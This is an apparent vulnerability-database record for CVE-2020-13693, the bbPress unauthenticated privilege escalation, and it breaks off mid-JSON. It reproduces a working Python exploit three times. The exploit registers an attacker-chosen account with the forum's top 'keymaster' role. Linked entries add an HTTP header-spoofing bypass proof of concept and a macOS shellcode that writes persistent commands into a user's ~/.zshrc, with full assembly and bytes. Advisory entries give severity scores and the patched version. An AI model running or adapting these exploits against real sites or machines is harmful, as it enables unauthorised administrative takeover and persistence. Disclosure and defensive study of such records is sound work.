WordPress BBPress 2.5 Privilege Escalation

2020-05-30T00:00:00

Description

{"id": "PACKETSTORM:157885", "type": "packetstorm", "bulletinFamily": "exploit", "title": "WordPress BBPress 2.5 Privilege Escalation", "description": "", "published": "2020-05-30T00:00:00", "modified": "2020-05-30T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://packetstormsecurity.com/files/157885/WordPress-BBPress-2.5-Privilege-Escalation.html", "reporter": "Raphael Karger", "references": [], "cvelist": ["CVE-2020-13693"], "lastseen": "2020-06-02T00:55:12", "viewCount": 405, "enchantments": {"dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:0356CC88D43175D964FA68AF7458DF7D", "0DAYDB:86305C86483A99E3E27347A2CBC3B02C", "0DAYDB:C06E37E65A886C423B5353B06FA027A6"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0487"]}, {"type": "cve", "idList": ["CVE-2020-13693"]}, {"type": "exploitdb", "idList": ["EDB-ID:48534"]}, {"type": "nessus", "idList": ["WEB_APPLICATION_SCANNING_112480"]}, {"type": "patchstack", "idList": ["PATCHSTACK:66DBD1A0DFD0556E1694B4938D30BF81"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:1A075D62-B5D2-4B58-A74F-73A0166AEE12"]}, {"type": "zdt", "idList": ["1337DAY-ID-34498"]}]}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "0daydb", "idList": ["0DAYDB:0356CC88D43175D964FA68AF7458DF7D", "0DAYDB:86305C86483A99E3E27347A2CBC3B02C", "0DAYDB:C06E37E65A886C423B5353B06FA027A6"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0487"]}, {"type": "cve", "idList": ["CVE-2020-13693"]}, {"type": "exploitdb", "idList": ["EDB-ID:48534"]}, {"type": "nessus", "idList": ["WEB_APPLICATION_SCANNING_112480"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:1A075D62-B5D2-4B58-A74F-73A0166AEE12"]}, {"type": "zdt", "idList": ["1337DAY-ID-34498"]}]}, "exploitation": null, "vulnersScore": 0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/157885/wpbbpress25-escalate.txt", "sourceData": "`# Exploit Title: Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation \n# Date: 2020-05-29 \n# Exploit Author: Raphael Karger \n# Software Link: https://codex.bbpress.org/releases/ \n# Version: BBPress < 2.5 \n# CVE: CVE-2020-13693 \n \nimport argparse \nimport requests \nimport bs4 \nimport urllib3 \nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) \n \nuseragent = {\"User-Agent\" : \"This is a real browser i swear\"} \n \ndef grab_nonce_login_page(url): \ntry: \nlogin_page_request = requests.get(url, verify=False, timeout=10, headers=useragent) \nsoup = bs4.BeautifulSoup(login_page_request.text, \"lxml\") \naction = soup.find(\"form\", class_=\"bbp-login-form\") \nwp_login_page = action.get(\"action\") \nwp_nonce = action.find(\"input\", id=\"_wpnonce\").get(\"value\") \nreturn (wp_nonce, wp_login_page) \nexcept Exception as nonce_error: \nprint(\"[-] Nonce Error: '{}'\".format(nonce_error)) \nreturn False \n \ndef exploit(url, username, password, email): \ninfo = grab_nonce_login_page(url) \nif info: \nnonce = info[0] \nlogin_page = info[1] \ntry: \nreturn requests.post(login_page, data={ \n\"user_login\" : username, \n\"user_pass\" : password, \n\"user_email\" : email, \n\"user-submit\" : \"\", \n\"user-cookie\" : \"1\", \n\"_wpnonce\" : nonce, \n\"bbp-forums-role\" : \"bbp_keymaster\" \n}, allow_redirects=False, verify=False, timeout=10, headers=useragent) \nexcept Exception as e: \nprint(\"[-] Error Making Signup Post Request: '{}'\".format(e)) \nreturn False \n \nif __name__ == \"__main__\": \nexit(\"asdasd\") \nparser = argparse.ArgumentParser() \nparser.add_argument(\"-n\", \"--username\", dest=\"username\", help=\"Username of Newly Created Keymaster\", default=\"raphaelrocks\") \nparser.add_argument(\"-p\", \"--password\", dest=\"password\", help=\"Password of Newly Created Keymaster\", default=\"raphael123\") \nparser.add_argument(\"-e\", \"--email\", dest=\"email\", help=\"Email of Newly Created Keymaster\", default=\"test@example.com\") \nparser.add_argument(\"-u\", \"--url\", dest=\"url\", help=\"URL of Page With Exposed Register Page.\", required=True) \nargs = parser.parse_args() \nsite_exploit = exploit(args.url, args.username, args.password, args.email) \nif site_exploit and site_exploit.status_code == 302: \nexit(\"[+] Exploit Successful, Use Username: '{}' and Password: '{}'\".format(args.username, args.password)) \nprint(\"[-] Exploit Failed\") \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660004461, "score": 1659954359}, "_internal": {"score_hash": "56adb30d71aeb7a041dd0b9b46345a6c"}}

{"0daydb": [{"lastseen": "2020-06-23T13:12:54", "description": "Crystal Shard http-protection version 0.2.0 suffers from an IP spoofing bypass vulnerability.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-02T13:52:06", "title": "Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13693"], "modified": "2020-06-02T13:52:06", "id": "0DAYDB:C06E37E65A886C423B5353B06FA027A6", "href": "https://0daydb.com/crystal-shard-http-protection-0-2-0-ip-spoofing-bypass.html", "sourceData": "# Exploit Title : Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass\n# Exploit Author : Halis Duraki (@0xduraki)\n# Date : 2020-05-28\n# Product : http-protection (Crystal Shard)\n# Product URI : https://github.com/rogeriozambon/http-protection\n# Version : http-protection <= 0.2.0\n# CVE : N/A\n\n## About the product\n\nThis library/shard (http-protection) protects against typical web attacks with-in Crystal applications. It was inspired by rack-protection Ruby gem. It is an open-source product developed by Rog\u00e9rio Zambon in Brazil. The total number of installs and respective usage is not known (no available information), but the Shard get the traction on Crystal official channels (Crystals' ANN, Gitter, and Shardbox).\n\n## About the exploit\n\nThe `IpSpoofing` middleware detects spoofing attacks (and likewise, should prevent it). Both of this functionalities can be bypassed by enumerating and hardcoding `X-*` header values. The middleware works by detecting difference between IP addr values of `X-Forwarded-For` & `X-Real-IP/X-Client-IP`. If the values mismatch, the middleware protects the application by forcing `403 (Forbidden)` response.\n\nRelevant code (src/http-protection/ip_spoofing.cr):\n\n```\nmodule HTTP::Protection\nclass IpSpoofing\n...\n\ndef call(... ctx)\n...\nips = headers[\"X-Forwarded-For\"].split(/\\s*,\\s*/)\n\nreturn forbidden(context) if headers.has_key?(\"X-Client-IP\") && !ips.includes?(headers[\"X-Client-IP\"])\nreturn forbidden(context) if headers.has_key?(\"X-Real-IP\") && !ips.includes?(headers[\"X-Real-IP\"])\n...\nend\nend\nend\n```\n\nThe exploit works by hardcoding the values in all protection request headers following the same const IP Address. The standard format for `X-Forwarded-For` from MDN reference those values as: `X-Forwarded-For: <client>, <proxy1>, <proxy2>`. HTTP request headers such as X-Forwarded-For, True-Client-IP, and X-Real-IP are not a robust foundation on which to build any security measures, such as access controls.\n\n@see CWE-16: https://cwe.mitre.org/data/definitions/16.html\n\n## PoC (Proof of Concept)\n\n* Set a breakpoint on the request, or intercept request.\n* Hardcore all three request headers:\n* X-Forwarded-For: 123.123.123.123\n* X-Client-IP: 123.123.123.123\n* X-Real-IP: 123.123.123.123\n* Continue request.\n* Response should be 200 OK, otherwise, 400 Forbidden.\n\n++ Request example (POC):\n\n```\nGET / HTTP/1.1\nHost: localhost.:8081\nX-Forwarded-For: 123.123.123.123\nX-Client-IP: 123.123.123.123\nX-Real-IP: 123.123.123.123\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nPragma: no-cache\nCache-Control: no-cache\n```\n\n++ Response (POC):\n\n```\n200 OK\n````\n\n## Fix\n\nIt is advised to fix the IpSpoofing detection via checking socket data directly instead of relying on passed header key/vals. The other solution is to force proxy to dismiss such data (on request) and use original source (proxified).\n\n==============================================================================================================\n+ Halis Duraki | [email\u00a0protected] | @0xduraki | https://duraki.github.io\n==============================================================================================================", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-23T13:12:54", "description": "WordPress BBPress plugin version 2.5 suffers from an unauthenticated privilege escalation vulnerability.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-02T13:53:36", "title": "WordPress BBPress 2.5 CVE-2020-13693 - Privilege Escalation", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13693"], "modified": "2020-06-02T13:53:36", "id": "0DAYDB:0356CC88D43175D964FA68AF7458DF7D", "href": "https://0daydb.com/wordpress-bbpress-2-5-cve-2020-13693-privilege-escalation.html", "sourceData": "# Exploit Title: WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation\n# Date: 2020-05-29\n# Exploit Author: Raphael Karger\n# Software Link: https://codex.bbpress.org/releases/\n# Version: BBPress < 2.5\n# CVE: CVE-2020-13693\n\nimport argparse\nimport requests\nimport bs4\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n \nuseragent = {\"User-Agent\" : \"This is a real browser i swear\"}\n\ndef grab_nonce_login_page(url):\n try:\n login_page_request = requests.get(url, verify=False, timeout=10, headers=useragent)\n soup = bs4.BeautifulSoup(login_page_request.text, \"lxml\")\n action = soup.find(\"form\", class_=\"bbp-login-form\")\n wp_login_page = action.get(\"action\")\n wp_nonce = action.find(\"input\", id=\"_wpnonce\").get(\"value\")\n return (wp_nonce, wp_login_page)\n except Exception as nonce_error:\n print(\"[-] Nonce Error: '{}'\".format(nonce_error))\n return False\n\ndef exploit(url, username, password, email):\n info = grab_nonce_login_page(url)\n if info:\n nonce = info[0]\n login_page = info[1]\n try:\n return requests.post(login_page, data={\n \"user_login\" : username,\n \"user_pass\" : password,\n \"user_email\" : email,\n \"user-submit\" : \"\",\n \"user-cookie\" : \"1\",\n \"_wpnonce\" : nonce,\n \"bbp-forums-role\" : \"bbp_keymaster\"\n }, allow_redirects=False, verify=False, timeout=10, headers=useragent)\n except Exception as e:\n print(\"[-] Error Making Signup Post Request: '{}'\".format(e))\n return False\n\nif __name__ == \"__main__\":\n exit(\"asdasd\")\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-n\", \"--username\", dest=\"username\", help=\"Username of Newly Created Keymaster\", default=\"raphaelrocks\")\n parser.add_argument(\"-p\", \"--password\", dest=\"password\", help=\"Password of Newly Created Keymaster\", default=\"raphael123\")\n parser.add_argument(\"-e\", \"--email\", dest=\"email\", help=\"Email of Newly Created Keymaster\", default=\"[email\u00a0protected]\")\n parser.add_argument(\"-u\", \"--url\", dest=\"url\", help=\"URL of Page With Exposed Register Page.\", required=True)\n args = parser.parse_args()\n site_exploit = exploit(args.url, args.username, args.password, args.email)\n if site_exploit and site_exploit.status_code == 302:\n exit(\"[+] Exploit Successful, Use Username: '{}' and Password: '{}'\".format(args.username, args.password))\n print(\"[-] Exploit Failed\")", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-23T13:12:54", "description": "198 bytes small macOS/x64 RickRolling shellcode.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-02T13:54:55", "title": "macOS/x64 zsh RickRolling - Shellcode", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3952", "CVE-2020-13693"], "modified": "2020-06-02T13:54:55", "id": "0DAYDB:86305C86483A99E3E27347A2CBC3B02C", "href": "https://0daydb.com/macos-x64-zsh-rickrolling-shellcode.html", "sourceData": "/*\n## Shellcode Title: macOS/x64 - zsh RickRolling Shellcode (198 Bytes)\n## Shellcode Author: Bobby Cooke\n## Date: May 31st, 2020\n## Tested on: macOS Catalina v10.15.4\n## Shellcode Description:\n## MacOS Catalina Dynamic, No-Null Shellcode that will Unmute the systems Volume, set the Volume to Maximum, and \"Rick Roll\" the user every time they open a Z-Shell Terminal Window. \n## The shellcode uses the UNIX ExecVE SysCall to spawn a UNIX SH (/bin/sh). The UNIX SH executes an Echo (/bin/echo) command that adds two commands to the users Z-Shell (zsh) Running Config File (~/.zshrc); the ~/.zshrc file will be created if it does not exist. The first command in the ~/.zshrc file leverages the macOS default system binary OSAScript (/usr/bin/osascript) too unmute the macOS system & set the volume too maximum. The second command in the ~/.zshrc file leverages the macOS default system binary Open (/usr/bin/open) to open the 'Rick Astley - Never Gonna Give You Up' video with the macOS systems default browser.\n## C Compile: gcc zsh-rickrolling.c -o zsh-rickrolling\n## Apple clang version 11.0.3 (clang-1103.0.32.62)\n## Compile & Test:\n## root# gcc zsh-rickrolling.c -o zsh-rickrolling\n## root# cat ~/.zshrc\n## cat: /var/root/.zshrc: No such file or directory\n## root# ./zsh-rickrolling\n## Shellcode Length: 198 Bytes\n## root# cat ~/.zshrc\n## osascript -e \"set Volume 9\"\n## open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\"\n## root# zsh\n## [email\u00a0protected] #\n## < Browser Pop & Rick Roll >\n\n---------------------------------------------------------------------\n\n;## ASM Compile: nasm -f macho64 zsh-rickrolling.asm\n;## NASM version 2.14.02 compiled on Sep 28 2019\n;## OBJ Link: ld zsh-rickrolling.o -lSystem -o zsh-rickrolling\n;## BUILD 17:57:49 Apr 24 2020\n;## Get SC: /bin/bash for x in $(objdump -d zsh-rickrolling.o -x86-asm-syntax=intel | grep \"^ \" | cut -f1 | awk -F: '{print $2}'); do echo -n \"\\x\"$x; done; echo\nglobal _main\n_main:\n; execve(const char *path, char *const argv[], char *const envp[]);\n; RAX RDI RSI RDX\n; RAX = 0x200003b = Execve System Call Number\n; RDI = &\"/bin/sh\\x00\"\n; RSI = RSP\n; [RSP+10] = argv[0] = &`/bin/sh\\x00`\n; [RSP+8] = argv[1] = &`-c\\x00`\n; [RSP+0] = argv[2] = &`echo \"open 'https...\n; RDX = 0x0\nregclear:\nxor rsi, rsi ; rsi = 0x0\nmul rsi ; rax & rdx = 0x0\nargv0:\nmov rcx, 0x68732f6e69622fff ; \"\\xff/bin/sh\"\nshr rcx, 0x8 ; \"/bin/sh\\x00\"\npush rcx ; rsp = &\"/bin/sh\\x00\"\nmov rdi, rsp ; rdi = *path = &\"/bin/sh\\x00\"\nargv1:\nadd dx, 0x632d ; \"-c\\x00\"\npush rdx ; rsp = &\"-c\\x00\"\nmov rbx, rsp ; rbx = &\"-c\\x00\"\nargv2:\n; \"echo 'osascript -e \\\"set Volume 9\\\"\\r\\nopen \\\"https://www.youtube.com/watch?v=dQw4w9WgXcQ\\\"' >> ~/.zshrc\"\n; String length : 98\nxor rcx, rcx\nadd cx, 0x6372 ; cr\npush rcx\nmov rcx, 0x68737a2e2f7e203e ; hsz./~ >\npush rcx\nmov rcx, 0x3e20272251635867 ; > '\"QcXg\npush rcx\nmov rcx, 0x573977347751643d ; W9w4wQd=\npush rcx\nmov rcx, 0x763f68637461772f ; v?hctaw/\npush rcx\nmov rcx, 0x6d6f632e65627574 ; moc.ebut\npush rcx\nmov rcx, 0x756f792e7777772f ; uoy.www/\npush rcx\nmov rcx, 0x2f3a737074746822 ; /:sptth\"\npush rcx\nmov rcx, 0x206e65706f0A0D22 ; nepo\\n\\r\"\npush rcx\nmov rcx, 0x3920656d756c6f56 ; 9 emuloV\npush rcx\nmov rcx, 0x207465732220652d ; tes\" e-\npush rcx\nmov rcx, 0x2074706972637361 ; tpircsa\npush rcx\nmov rcx, 0x736f27206f686365 ; so' ohce\npush rcx\nmov r9, rsp ; r9 = &`echo \"open 'https...\nloadArgv:\nxor rdx, rdx ; rdx = envp[] = 0x0\npush rdx ; [RSP+18] = 0x0\npush r9 ; [RSP+10] = argv[2] = &Command String\npush rbx ; [RSP+8] = argv[1] = &`-c\\x00`\npush rdi ; [RSP+0] = argv[0] = &`/bin/sh\\x00`\nmov rsi, rsp ; rsi = argv[]\nexecve:\nmov al,2 ; rax = 0x2\nror rax, 0x28 ; rax = 0x2000000\nmov al, 0x3b ; rax = 0x200003b\nsyscall ; execve system call\n\n---------------------------------------------------------------------\n\n*/\n\n#include <stdio.h>\n#include <sys/mman.h>\n#include <string.h>\n#include <stdlib.h>\n\nint (*sc)();\n\nchar shellcode[] =\n \"\\x48\\x31\\xf6\\x48\\xf7\\xe6\\x48\\xb9\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x48\"\n \"\\xc1\\xe9\\x08\\x51\\x48\\x89\\xe7\\x66\\x81\\xc2\\x2d\\x63\\x52\\x48\\x89\\xe3\\x48\"\n \"\\x31\\xc9\\x66\\x81\\xc1\\x72\\x63\\x51\\x48\\xb9\\x3e\\x20\\x7e\\x2f\\x2e\\x7a\\x73\"\n \"\\x68\\x51\\x48\\xb9\\x67\\x58\\x63\\x51\\x22\\x27\\x20\\x3e\\x51\\x48\\xb9\\x3d\\x64\"\n \"\\x51\\x77\\x34\\x77\\x39\\x57\\x51\\x48\\xb9\\x2f\\x77\\x61\\x74\\x63\\x68\\x3f\\x76\"\n \"\\x51\\x48\\xb9\\x74\\x75\\x62\\x65\\x2e\\x63\\x6f\\x6d\\x51\\x48\\xb9\\x2f\\x77\\x77\"\n \"\\x77\\x2e\\x79\\x6f\\x75\\x51\\x48\\xb9\\x22\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x51\"\n \"\\x48\\xb9\\x22\\x0d\\x0a\\x6f\\x70\\x65\\x6e\\x20\\x51\\x48\\xb9\\x56\\x6f\\x6c\\x75\"\n \"\\x6d\\x65\\x20\\x39\\x51\\x48\\xb9\\x2d\\x65\\x20\\x22\\x73\\x65\\x74\\x20\\x51\\x48\"\n \"\\xb9\\x61\\x73\\x63\\x72\\x69\\x70\\x74\\x20\\x51\\x48\\xb9\\x65\\x63\\x68\\x6f\\x20\"\n \"\\x27\\x6f\\x73\\x51\\x49\\x89\\xe1\\x48\\x31\\xd2\\x52\\x41\\x51\\x53\\x57\\x48\\x89\"\n \"\\xe6\\xb0\\x02\\x48\\xc1\\xc8\\x28\\xb0\\x3b\\x0f\\x05\";\n\nint main(int argc, char **argv) {\n printf(\"Shellcode Length: %zd Bytes\\n\", strlen(shellcode));\n\n void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);\n\n if (ptr == MAP_FAILED) {\n perror(\"mmap\");\n exit(-1);\n }\n\n memcpy(ptr, shellcode, sizeof(shellcode));\n sc = ptr;\n\n sc();\n\n return 0;\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:39:16", "description": "A Privilege Escalation vulnerability exists in Wordpress BBPress Plugin. Successful exploitation of this vulnerability would allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-11T00:00:00", "type": "checkpoint_advisories", "title": "Wordpress BBPress Plugin Privilege Escalation (CVE-2020-13693)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13693"], "modified": "2020-06-11T00:00:00", "id": "CPAI-2020-0487", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T12:54:31", "description": "An unauthenticated privilege-escalation issue exists in the bbPress plugin before 2.6.5 for WordPress when New User Registration is enabled.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-29T00:15:00", "type": "cve", "title": "CVE-2020-13693", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13693"], "modified": "2021-12-13T19:17:00", "cpe": [], "id": "CVE-2020-13693", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13693", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "zdt": [{"lastseen": "2020-07-19T21:57:43", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2020-06-01T00:00:00", "type": "zdt", "title": "Wordpress BBPress 2.5 Plugin - Unauthenticated Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-13693"], "modified": "2020-06-01T00:00:00", "id": "1337DAY-ID-34498", "href": "https://0day.today/exploit/description/34498", "sourceData": "# Exploit Title: Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation\r\n# Exploit Author: Raphael Karger\r\n# Software Link: https://codex.bbpress.org/releases/\r\n# Version: BBPress < 2.5\r\n# CVE: CVE-2020-13693\r\n\r\nimport argparse\r\nimport requests\r\nimport bs4\r\nimport urllib3\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n \r\nuseragent = {\"User-Agent\" : \"This is a real browser i swear\"}\r\n\r\ndef grab_nonce_login_page(url):\r\n try:\r\n login_page_request = requests.get(url, verify=False, timeout=10, headers=useragent)\r\n soup = bs4.BeautifulSoup(login_page_request.text, \"lxml\")\r\n action = soup.find(\"form\", class_=\"bbp-login-form\")\r\n wp_login_page = action.get(\"action\")\r\n wp_nonce = action.find(\"input\", id=\"_wpnonce\").get(\"value\")\r\n return (wp_nonce, wp_login_page)\r\n except Exception as nonce_error:\r\n print(\"[-] Nonce Error: '{}'\".format(nonce_error))\r\n return False\r\n\r\ndef exploit(url, username, password, email):\r\n info = grab_nonce_login_page(url)\r\n if info:\r\n nonce = info[0]\r\n login_page = info[1]\r\n try:\r\n return requests.post(login_page, data={\r\n \"user_login\" : username,\r\n \"user_pass\" : password,\r\n \"user_email\" : email,\r\n \"user-submit\" : \"\",\r\n \"user-cookie\" : \"1\",\r\n \"_wpnonce\" : nonce,\r\n \"bbp-forums-role\" : \"bbp_keymaster\"\r\n }, allow_redirects=False, verify=False, timeout=10, headers=useragent)\r\n except Exception as e:\r\n print(\"[-] Error Making Signup Post Request: '{}'\".format(e))\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n exit(\"asdasd\")\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-n\", \"--username\", dest=\"username\", help=\"Username of Newly Created Keymaster\", default=\"raphaelrocks\")\r\n parser.add_argument(\"-p\", \"--password\", dest=\"password\", help=\"Password of Newly Created Keymaster\", default=\"raphael123\")\r\n parser.add_argument(\"-e\", \"--email\", dest=\"email\", help=\"Email of Newly Created Keymaster\", default=\"[email\u00a0protected]\")\r\n parser.add_argument(\"-u\", \"--url\", dest=\"url\", help=\"URL of Page With Exposed Register Page.\", required=True)\r\n args = parser.parse_args()\r\n site_exploit = exploit(args.url, args.username, args.password, args.email)\r\n if site_exploit and site_exploit.status_code == 302:\r\n exit(\"[+] Exploit Successful, Use Username: '{}' and Password: '{}'\".format(args.username, args.password))\r\n print(\"[-] Exploit Failed\")\n\n# 0day.today [2020-07-19] #", "sourceHref": "https://0day.today/exploit/34498", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-06-01T19:34:57", "description": "Unauthenticated Privilege Escalation vulnerability discovered by Raphael Karger in WordPress bbPress plugin (versions <= 2.6.4).\n\n## Solution\n\n\r\n Update the WordPress bbPress plugin to the latest available version (at least 2.6.5).\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-29T00:00:00", "type": "patchstack", "title": "WordPress bbPress plugin <= 2.6.4 - Unauthenticated Privilege Escalation vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13693"], "modified": "2020-05-29T00:00:00", "id": "PATCHSTACK:66DBD1A0DFD0556E1694B4938D30BF81", "href": 